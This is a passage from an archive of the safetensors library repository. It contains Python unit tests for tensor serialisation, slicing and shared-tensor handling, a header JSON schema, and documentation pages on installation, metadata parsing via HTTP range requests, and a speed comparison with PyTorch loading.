# doing copies self.assertEqual( _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}] ) model2.load_state_dict(torch.load("tmp2.bin")) self.assertEqual( _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}] ) # However safetensors cannot save those, so we cannot # reload the saved file with the different model save_model(model, "tmp2.safetensors") with self.assertRaises(RuntimeError) as ctx: load_model(model2, "tmp2.safetensors") self.assertIn("""Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception)) def test_difference_torch_odd(self): model = NoSharedModel() a = model.a.weight b = model.b.weight self.assertNotEqual(a.data_ptr(), b.data_ptr()) torch.save(model.state_dict(), "tmp3.bin") model2 = Model() self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}]) # Torch will affect either `b` or `a` to the shared tensor in the `model2` model2.load_state_dict(torch.load("tmp3.bin")) # XXX: model2 uses only the B weight not the A weight anymore. self.assertFalse(torch.allclose(model2.a.weight, model.a.weight)) torch.testing.assert_close(model2.a.weight, model.b.weight) self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}]) # Everything is saved as-is save_model(model, "tmp3.safetensors") # safetensors will yell that there were 2 tensors on disk, while # the models expects only 1 tensor since both are shared. with self.assertRaises(RuntimeError) as ctx: load_model(model2, "tmp3.safetensors") # Safetensors properly warns the user that some ke self.assertIn("""Unexpected key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception)) safetensors-0.5.2/bindings/python/tests/test_simple.py000066400000000000000000000317271473753372300232640ustar00rootroot00000000000000import os import tempfile import unittest from pathlib import Path import numpy as np import torch from safetensors import SafetensorError, safe_open, serialize from safetensors.numpy import load, load_file, save, save_file from safetensors.torch import _find_shared_tensors from safetensors.torch import load_file as load_file_pt from safetensors.torch import save_file as save_file_pt from safetensors.torch import storage_ptr, storage_size class TestCase(unittest.TestCase): def test_serialization(self): data = np.zeros((2, 2), dtype=np.int32) out = save({"test": data}) self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) save_file({"test": data}, "serialization.safetensors") out = open("serialization.safetensors", "rb").read() self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) data[1, 1] = 1 out = save({"test": data}) self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", ) save_file({"test": data}, "serialization.safetensors") out = open("serialization.safetensors", "rb").read() self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", ) def test_deserialization(self): serialized = 
b"""<\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""" out = load(serialized) self.assertEqual(list(out.keys()), ["test"]) np.testing.assert_array_equal(out["test"], np.zeros((2, 2), dtype=np.int32)) def test_deserialization_metadata(self): serialized = ( b'f\x00\x00\x00\x00\x00\x00\x00{"__metadata__":{"framework":"pt"},"test1":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}}' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" ) with tempfile.NamedTemporaryFile() as f: f.write(serialized) f.seek(0) with safe_open(f.name, framework="np") as g: self.assertEqual(g.metadata(), {"framework": "pt"}) def test_serialization_order_invariant(self): data = np.zeros((2, 2), dtype=np.int32) out1 = save({"test1": data, "test2": data}) out2 = save({"test2": data, "test1": data}) self.assertEqual(out1, out2) def test_serialization_forces_alignment(self): data = np.zeros((2, 2), dtype=np.int32) data2 = np.zeros((2, 2), dtype=np.float16) out1 = save({"test1": data, "test2": data2}) out2 = save({"test2": data2, "test1": data}) self.assertEqual(out1, out2) self.assertEqual( out1, b'\x80\x00\x00\x00\x00\x00\x00\x00{"test1":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]},"test2":{"dtype":"F16","shape":[2,2],"data_offsets":[16,24]}}' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) self.assertEqual(out1[8:].index(b"\x00") + 8, 136) self.assertEqual((out1[8:].index(b"\x00") + 8) % 8, 0) def test_serialization_metadata(self): data = np.zeros((2, 2), dtype=np.int32) out1 = save({"test1": data}, metadata={"framework": "pt"}) self.assertEqual( out1, b'`\x00\x00\x00\x00\x00\x00\x00{"__metadata__":{"framework":"pt"},"test1":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}}' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) self.assertEqual(out1[8:].index(b"\x00") + 8, 104) self.assertEqual((out1[8:].index(b"\x00") + 8) % 8, 0) def test_serialization_no_big_endian(self): # Big endian tensor data = np.zeros((2, 2), dtype=">i4") out1 = save({"test1": data}, metadata={"framework": "pt"}) self.assertEqual( out1, b'`\x00\x00\x00\x00\x00\x00\x00{"__metadata__":{"framework":"pt"},"test1":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}}' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) self.assertEqual(out1[8:].index(b"\x00") + 8, 104) self.assertEqual((out1[8:].index(b"\x00") + 8) % 8, 0) def test_accept_path(self): tensors = { "a": torch.zeros((2, 2)), "b": torch.zeros((2, 3), dtype=torch.uint8), } save_file_pt(tensors, Path("./out.safetensors")) load_file_pt(Path("./out.safetensors")) os.remove(Path("./out.safetensors")) def test_pt_sf_save_model_overlapping_storage(self): m = torch.randn(10) n = torch.empty([], dtype=m.dtype, device=m.device) element_size = torch.finfo(m.dtype).bits // 8 try: smaller_storage = m.untyped_storage()[: 4 * element_size] except Exception: try: # Fallback for torch>=1.13 smaller_storage = m.storage().untyped()[: 4 * element_size] except Exception: try: # Fallback for torch>=1.11 smaller_storage = m.storage()._untyped()[: 4 * element_size] except Exception: # Fallback for torch==1.10 smaller_storage = m.storage()[:4] n.set_(source=smaller_storage) # Check that we can have tensors with storage that have the same `data_ptr` but not the same storage size self.assertEqual(storage_ptr(n), storage_ptr(m)) self.assertNotEqual(storage_size(n), storage_size(m)) 
self.assertEqual(storage_size(n), 4 * element_size) self.assertEqual(storage_size(m), 10 * element_size) shared_tensors = _find_shared_tensors({"m": m, "n": n}) self.assertEqual(shared_tensors, [{"m"}, {"n"}]) class WindowsTestCase(unittest.TestCase): def test_get_correctly_dropped(self): tensors = { "a": torch.zeros((2, 2)), "b": torch.zeros((2, 3), dtype=torch.uint8), } save_file_pt(tensors, "./out.safetensors") with safe_open("./out.safetensors", framework="pt") as f: pass with self.assertRaises(SafetensorError): print(f.keys()) with open("./out.safetensors", "w") as g: g.write("something") class ErrorsTestCase(unittest.TestCase): def test_file_not_found(self): with self.assertRaises(FileNotFoundError) as ctx: with safe_open("notafile", framework="pt"): pass self.assertEqual(str(ctx.exception), 'No such file or directory: "notafile"') class ReadmeTestCase(unittest.TestCase): def assertTensorEqual(self, tensors1, tensors2, equality_fn): self.assertEqual(tensors1.keys(), tensors2.keys(), "tensor keys don't match") for k, v1 in tensors1.items(): v2 = tensors2[k] self.assertTrue(equality_fn(v1, v2), f"{k} tensors are different") def test_numpy_example(self): tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)} save_file(tensors, "./out.safetensors") out = save(tensors) # Now loading loaded = load_file("./out.safetensors") self.assertTensorEqual(tensors, loaded, np.allclose) loaded = load(out) self.assertTensorEqual(tensors, loaded, np.allclose) def test_numpy_bool(self): tensors = {"a": np.asarray(False)} save_file(tensors, "./out_bool.safetensors") out = save(tensors) # Now loading loaded = load_file("./out_bool.safetensors") self.assertTensorEqual(tensors, loaded, np.allclose) loaded = load(out) self.assertTensorEqual(tensors, loaded, np.allclose) def test_torch_example(self): tensors = { "a": torch.zeros((2, 2)), "b": torch.zeros((2, 3), dtype=torch.uint8), } # Saving modifies the tensors to type numpy, so we must copy for the # test to be correct. 
tensors2 = tensors.copy() save_file_pt(tensors, "./out.safetensors") # Now loading loaded = load_file_pt("./out.safetensors") self.assertTensorEqual(tensors2, loaded, torch.allclose) def test_exception(self): flattened = {"test": {"dtype": "float32", "shape": [1]}} with self.assertRaises(SafetensorError): serialize(flattened) def test_torch_slice(self): A = torch.randn((10, 5)) tensors = { "a": A, } save_file_pt(tensors, "./slice.safetensors") # Now loading with safe_open("./slice.safetensors", framework="pt", device="cpu") as f: slice_ = f.get_slice("a") tensor = slice_[:] self.assertEqual(list(tensor.shape), [10, 5]) torch.testing.assert_close(tensor, A) tensor = slice_[tuple()] self.assertEqual(list(tensor.shape), [10, 5]) torch.testing.assert_close(tensor, A) tensor = slice_[:2] self.assertEqual(list(tensor.shape), [2, 5]) torch.testing.assert_close(tensor, A[:2]) tensor = slice_[:, :2] self.assertEqual(list(tensor.shape), [10, 2]) torch.testing.assert_close(tensor, A[:, :2]) tensor = slice_[0, :2] self.assertEqual(list(tensor.shape), [2]) torch.testing.assert_close(tensor, A[0, :2]) tensor = slice_[2:, 0] self.assertEqual(list(tensor.shape), [8]) torch.testing.assert_close(tensor, A[2:, 0]) tensor = slice_[2:, 1] self.assertEqual(list(tensor.shape), [8]) torch.testing.assert_close(tensor, A[2:, 1]) tensor = slice_[2:, -1] self.assertEqual(list(tensor.shape), [8]) torch.testing.assert_close(tensor, A[2:, -1]) tensor = slice_[list()] self.assertEqual(list(tensor.shape), [0, 5]) torch.testing.assert_close(tensor, A[list()]) def test_numpy_slice(self): A = np.random.rand(10, 5) tensors = { "a": A, } save_file(tensors, "./slice.safetensors") # Now loading with safe_open("./slice.safetensors", framework="np", device="cpu") as f: slice_ = f.get_slice("a") tensor = slice_[:] self.assertEqual(list(tensor.shape), [10, 5]) self.assertTrue(np.allclose(tensor, A)) tensor = slice_[tuple()] self.assertEqual(list(tensor.shape), [10, 5]) self.assertTrue(np.allclose(tensor, A)) tensor = slice_[:2] self.assertEqual(list(tensor.shape), [2, 5]) self.assertTrue(np.allclose(tensor, A[:2])) tensor = slice_[:, :2] self.assertEqual(list(tensor.shape), [10, 2]) self.assertTrue(np.allclose(tensor, A[:, :2])) tensor = slice_[0, :2] self.assertEqual(list(tensor.shape), [2]) self.assertTrue(np.allclose(tensor, A[0, :2])) tensor = slice_[2:, 0] self.assertEqual(list(tensor.shape), [8]) self.assertTrue(np.allclose(tensor, A[2:, 0])) tensor = slice_[2:, 1] self.assertEqual(list(tensor.shape), [8]) self.assertTrue(np.allclose(tensor, A[2:, 1])) tensor = slice_[2:, -1] self.assertEqual(list(tensor.shape), [8]) self.assertTrue(np.allclose(tensor, A[2:, -1])) tensor = slice_[2:, -5] self.assertEqual(list(tensor.shape), [8]) self.assertTrue(np.allclose(tensor, A[2:, -5])) tensor = slice_[list()] self.assertEqual(list(tensor.shape), [0, 5]) self.assertTrue(np.allclose(tensor, A[list()])) with self.assertRaises(SafetensorError) as cm: tensor = slice_[2:, -6] self.assertEqual(str(cm.exception), "Invalid index -6 for dimension 1 of size 5") with self.assertRaises(SafetensorError) as cm: tensor = slice_[[0, 1]] self.assertEqual(str(cm.exception), "Non empty lists are not implemented") with self.assertRaises(SafetensorError) as cm: tensor = slice_[2:, 20] self.assertEqual( str(cm.exception), "Error during slicing [2:20] with shape [10, 5]: SliceOutOfRange { dim_index: 1, asked: 20, dim_size: 5 }", ) 
safetensors-0.5.2/bindings/python/tests/test_tf_comparison.py000066400000000000000000000054411473753372300246300ustar00rootroot00000000000000import unittest import h5py import numpy as np import tensorflow as tf from safetensors import safe_open from safetensors.tensorflow import load_file, save_file def _load(f, tensors=None, prefix=""): if tensors is None: tensors = {} for k in f.keys(): if isinstance(f[k], h5py._hl.dataset.Dataset): key = k if not prefix else f"{prefix}_{k}" tensors[key] = tf.convert_to_tensor(np.array(f[k])) else: tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) return tensors def _save(f, tensors, prefix=""): for name, tensor in tensors.items(): tensor = tensor.numpy() dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) dset[:] = tensor class SafeTestCase(unittest.TestCase): def setUp(self): data = { "test": tf.zeros((1024, 1024), dtype=tf.float32), "test2": tf.zeros((1024, 1024), dtype=tf.float32), "test3": tf.zeros((1024, 1024), dtype=tf.float32), } self.tf_filename = "./tests/data/tf_load.h5" self.sf_filename = "./tests/data/tf_load.safetensors" with h5py.File(self.tf_filename, "w") as f: _save(f, data) save_file(data, self.sf_filename) def test_zero_sized(self): data = { "test": tf.zeros((2, 0), dtype=tf.float32), } local = "./tests/data/out_safe_flat_mmap_small2.safetensors" save_file(data.copy(), local) reloaded = load_file(local) # Empty tensor != empty tensor on numpy, so comparing shapes # instead self.assertEqual(data["test"].shape, reloaded["test"].shape) def test_deserialization_safe(self): weights = load_file(self.sf_filename) with h5py.File(self.tf_filename, "r") as f: tf_weights = _load(f) for k, v in weights.items(): tv = tf_weights[k] self.assertTrue(np.allclose(v, tv)) def test_bfloat16(self): data = { "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16), } save_file(data, self.sf_filename) weights = {} with safe_open(self.sf_filename, framework="tf") as f: for k in f.keys(): weights[k] = f.get_tensor(k) for k, v in weights.items(): tv = data[k] self.assertTrue(tf.experimental.numpy.allclose(v, tv)) def test_deserialization_safe_open(self): weights = {} with safe_open(self.sf_filename, framework="tf") as f: for k in f.keys(): weights[k] = f.get_tensor(k) with h5py.File(self.tf_filename, "r") as f: tf_weights = _load(f) for k, v in weights.items(): tv = tf_weights[k] self.assertTrue(np.allclose(v, tv)) safetensors-0.5.2/codecov.yaml000066400000000000000000000000171473753372300163740ustar00rootroot00000000000000comment: false safetensors-0.5.2/codecov.yml000066400000000000000000000000171473753372300162330ustar00rootroot00000000000000comment: false safetensors-0.5.2/docs/000077500000000000000000000000001473753372300150205ustar00rootroot00000000000000safetensors-0.5.2/docs/safetensors.schema.json000066400000000000000000000031471473753372300215130ustar00rootroot00000000000000{ "$schema": "https://json-schema.org/draft/2020-12/schema", "title": "safetensors format header", "description": "Describes the structure of all the tensors and their metadata", "$defs": { "size_t": { "type": "integer", "minimum": 0, "maximum": 281474976710655, "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)" }, "Tensor": { "title": "Tensor", "description": "Describes the structure of one tensor", "type": "object", "additionalProperties": false, "properties": { "dtype": { "type": "string", "pattern": "([UIF])(8|16|32|64|128|256)", "description": "Type of the array. 
U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits." }, "shape": { "type": "array", "items": { "$ref": "#/$defs/size_t", "description": "Size of each dimension." } }, "data_offsets": { "type": "array", "prefixItems": [ { "$ref": "#/$defs/size_t", "description": "Start offset of the array. " }, { "$ref": "#/$defs/size_t", "description": "End offset of the array. Equal to the previous item + array size." } ] } }, "required": [ "data_offsets", "dtype", "shape" ] }, "Metadata": { "type": "object", "additionalProperties": {"type": "string"}, "title": "Metadata" } }, "type": "object", "properties": { "__metadata__": { "description": "Arbitrary metadata", "$ref": "#/$defs/Metadata" } }, "additionalProperties": { "$ref": "#/$defs/Tensor" } } safetensors-0.5.2/docs/source/000077500000000000000000000000001473753372300163205ustar00rootroot00000000000000safetensors-0.5.2/docs/source/_toctree.yml000066400000000000000000000010761473753372300206530ustar00rootroot00000000000000- sections: - local: index title: 🤗 Safetensors - local: speed title: Speed Comparison - local: torch_shared_tensors title: Tensor Sharing in Pytorch - local: metadata_parsing title: Metadata Parsing - local: convert-weights title: Convert weights to safetensors title: Getting started - sections: - local: api/torch title: Torch API - local: api/tensorflow title: Tensorflow API - local: api/paddle title: PaddlePaddle API - local: api/flax title: Flax API - local: api/numpy title: Numpy API title: API safetensors-0.5.2/docs/source/api/000077500000000000000000000000001473753372300170715ustar00rootroot00000000000000safetensors-0.5.2/docs/source/api/flax.mdx000066400000000000000000000002361473753372300205360ustar00rootroot00000000000000# Flax API [[autodoc]] safetensors.flax.load_file [[autodoc]] safetensors.flax.load [[autodoc]] safetensors.flax.save_file [[autodoc]] safetensors.flax.save safetensors-0.5.2/docs/source/api/numpy.mdx000066400000000000000000000002431473753372300207520ustar00rootroot00000000000000# Numpy API [[autodoc]] safetensors.numpy.load_file [[autodoc]] safetensors.numpy.load [[autodoc]] safetensors.numpy.save_file [[autodoc]] safetensors.numpy.save safetensors-0.5.2/docs/source/api/paddle.mdx000066400000000000000000000002561473753372300210370ustar00rootroot00000000000000# PaddlePaddle API [[autodoc]] safetensors.paddle.load_file [[autodoc]] safetensors.paddle.load [[autodoc]] safetensors.paddle.save_file [[autodoc]] safetensors.paddle.save safetensors-0.5.2/docs/source/api/tensorflow.mdx000066400000000000000000000002741473753372300220100ustar00rootroot00000000000000# Tensorflow API [[autodoc]] safetensors.tensorflow.load_file [[autodoc]] safetensors.tensorflow.load [[autodoc]] safetensors.tensorflow.save_file [[autodoc]] safetensors.tensorflow.save safetensors-0.5.2/docs/source/api/torch.mdx000066400000000000000000000003651473753372300207260ustar00rootroot00000000000000# Torch API [[autodoc]] safetensors.torch.load_file [[autodoc]] safetensors.torch.load [[autodoc]] safetensors.torch.save_file [[autodoc]] safetensors.torch.save [[autodoc]] safetensors.torch.load_model [[autodoc]] safetensors.torch.save_model safetensors-0.5.2/docs/source/convert-weights.md000066400000000000000000000021041473753372300217670ustar00rootroot00000000000000# Convert weights to safetensors PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. 
To save and store your model weights in the more secure `safetensor` format, we recommend converting your weights to `.safetensors`. The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), given your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository. For larger models, the Space may be a bit slower because its resources are tied up in converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights. Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space. safetensors-0.5.2/docs/source/index.mdx000066400000000000000000000067351473753372300201540ustar00rootroot00000000000000
# Safetensors Safetensors is a new simple format for storing tensors safely (as opposed to pickle) and that is still fast (zero-copy). Safetensors is really [fast 🚀](./speed). ## Installation with pip: ``` pip install safetensors ``` with conda: ``` conda install -c huggingface safetensors ``` ## Usage ### Load tensors ```python from safetensors import safe_open tensors = {} with safe_open("model.safetensors", framework="pt", device=0) as f: for k in f.keys(): tensors[k] = f.get_tensor(k) ``` Loading only part of the tensors (interesting when running on multiple GPU) ```python from safetensors import safe_open tensors = {} with safe_open("model.safetensors", framework="pt", device=0) as f: tensor_slice = f.get_slice("embedding") vocab_size, hidden_dim = tensor_slice.get_shape() tensor = tensor_slice[:, :hidden_dim] ``` ### Save tensors ```python import torch from safetensors.torch import save_file tensors = { "embedding": torch.zeros((2, 2)), "attention": torch.zeros((2, 3)) } save_file(tensors, "model.safetensors") ``` ## Format Let's say you have safetensors file named `model.safetensors`, then `model.safetensors` will have the following internal format:
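The file starts with 8 bytes holding the size of a JSON header, stored as a little-endian unsigned 64-bit integer. The JSON header maps each tensor name to its `dtype`, `shape` and `data_offsets`, plus an optional `__metadata__` entry of free-form string key/values. Everything after the header is a single flat byte buffer, and each tensor's `data_offsets` are `[begin, end)` positions relative to the start of that buffer. A minimal sketch of reading this layout from a local file (error handling omitted):

```python
import json
import struct

with open("model.safetensors", "rb") as f:
    # First 8 bytes: length of the JSON header, little-endian unsigned 64-bit integer
    (header_size,) = struct.unpack("<Q", f.read(8))
    # JSON header: tensor name -> {"dtype", "shape", "data_offsets"}, plus optional "__metadata__"
    header = json.loads(f.read(header_size))

for name, info in header.items():
    if name == "__metadata__":
        continue
    # data_offsets are [begin, end) byte positions relative to the start of the
    # byte buffer, i.e. relative to position 8 + header_size in the file
    print(name, info["dtype"], info["shape"], info["data_offsets"])
```

Because the tensors are laid out back to back in that single buffer, a reader can memory-map the file and slice out exactly the bytes it needs, which is what makes zero-copy and lazy loading possible.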
## Featured Projects Safetensors is being used widely at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors: * [huggingface/transformers](https://github.com/huggingface/transformers) * [ml-explore/mlx](https://github.com/ml-explore/mlx) * [huggingface/candle](https://github.com/huggingface/candle) * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537) * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix) * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI) * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models) * [CivitAI](https://civitai.com/) * [huggingface/diffusers](https://github.com/huggingface/diffusers) * [coreylowman/dfdx](https://github.com/coreylowman/dfdx) * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI) * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui) * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner) * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP) * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT) * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry) * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI) * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE) * [alvarobartt/safejax](https://github.com/alvarobartt/safejax) * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic) safetensors-0.5.2/docs/source/metadata_parsing.mdx000066400000000000000000000171471473753372300223470ustar00rootroot00000000000000# Metadata Parsing Given the simplicity of the format, it's very simple and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests). This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code follows below), but it would be similar in any language. ## Example use case There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights:
## Usage

From [🤗 Hub](hf.co/models), you can get metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. In the example Python script below (you can use any language that has HTTP request support), we are parsing the metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors).

```python
import requests # pip install requests
import struct

def parse_single_file(url):
    # Fetch the first 8 bytes of the file
    headers = {'Range': 'bytes=0-7'}
    response = requests.get(url, headers=headers)
    # Interpret the bytes as a little-endian unsigned 64-bit integer
    length_of_header = struct.unpack('<Q', response.content)[0]
    # Fetch length_of_header bytes starting from the 9th byte
    headers = {'Range': f'bytes=8-{7 + length_of_header}'}
    response = requests.get(url, headers=headers)
    # Interpret the response as a JSON object
    header = response.json()
    return header

url = "https://huggingface.co/gpt2/resolve/main/model.safetensors"
header = parse_single_file(url)
print(header)
```

Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js):

```ts
import { parseSafetensorsMetadata } from "@huggingface/hub";

const info = await parseSafetensorsMetadata({
  repo: { type: "model", name: "bigscience/bloom" },
});

console.log(info)
// {
//   sharded: true,
//   index: {
//     metadata: { total_size: 352494542848 },
//     weight_map: {
//       'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors',
//       ...
//     }
//   },
//   headers: {
//     __metadata__: {'format': 'pt'},
//     'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]},
//     ...
//   }
// }
```

Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be:

```ts
export type SafetensorsParseFromRepo =
  | {
      sharded: false;
      header: SafetensorsFileHeader;
    }
  | {
      sharded: true;
      index: SafetensorsIndexJson;
      headers: SafetensorsShardedHeaders;
    };
```

where the underlying `types` are the following:

```ts
type FileName = string;

type TensorName = string;
type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL";

interface TensorInfo {
  dtype: Dtype;
  shape: number[];
  data_offsets: [number, number];
}

type SafetensorsFileHeader = Record<TensorName, TensorInfo> & {
  __metadata__: Record<string, string>;
};

interface SafetensorsIndexJson {
  weight_map: Record<TensorName, FileName>;
}

export type SafetensorsShardedHeaders = Record<FileName, SafetensorsFileHeader>;
```

[`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata. Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model. Depending on whether the model is sharded or not, one or multiple safetensors files will be parsed.

```python
>>> from huggingface_hub import get_safetensors_metadata

# Parse repo with single weights file
>>> metadata = get_safetensors_metadata("bigscience/bloomz-560m")
>>> metadata
SafetensorsRepoMetadata(
    metadata=None,
    sharded=False,
    weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...},
    files_metadata={'model.safetensors': SafetensorsFileMetadata(...)}
)
>>> metadata.files_metadata["model.safetensors"].metadata
{'format': 'pt'}

# Parse repo with sharded model (i.e.
multiple weights files) >>> metadata = get_safetensors_metadata("bigscience/bloom") Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s] >>> metadata SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...}) >>> len(metadata.files_metadata) 72 # All safetensors files have been fetched # Parse repo that is not a safetensors repo >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5") NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files. ``` To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata). ## Example output For instance, here are the number of params per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more examples of usage. model | safetensors | params --- | --- | --- [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 } [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 } [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 } [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 } [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 } [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 } [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 } [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 } [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 } safetensors-0.5.2/docs/source/speed.mdx000066400000000000000000000065661473753372300201470ustar00rootroot00000000000000# Speed Comparison Open In Colab `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. To run the [GPU benchmark](#gpu-benchmark), make sure your machine has GPU or you have selected `GPU runtime` if you are using Google Colab. 
Before you begin, make sure you have all the necessary libraries installed: ```bash pip install safetensors huggingface_hub torch ``` Let's start by importing all the packages that will be used: ```py >>> import os >>> import datetime >>> from huggingface_hub import hf_hub_download >>> from safetensors.torch import load_file >>> import torch ``` Download safetensors & torch weights for gpt2: ```py >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors") >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin") ``` ### CPU benchmark ```py >>> start_st = datetime.datetime.now() >>> weights = load_file(sf_filename, device="cpu") >>> load_time_st = datetime.datetime.now() - start_st >>> print(f"Loaded safetensors {load_time_st}") >>> start_pt = datetime.datetime.now() >>> weights = torch.load(pt_filename, map_location="cpu") >>> load_time_pt = datetime.datetime.now() - start_pt >>> print(f"Loaded pytorch {load_time_pt}") >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") Loaded safetensors 0:00:00.004015 Loaded pytorch 0:00:00.307460 on CPU, safetensors is faster than pytorch by: 76.6 X ``` This speedup is due to the fact that this library avoids unnecessary copies by mapping the file directly. It is actually possible to do on [pure 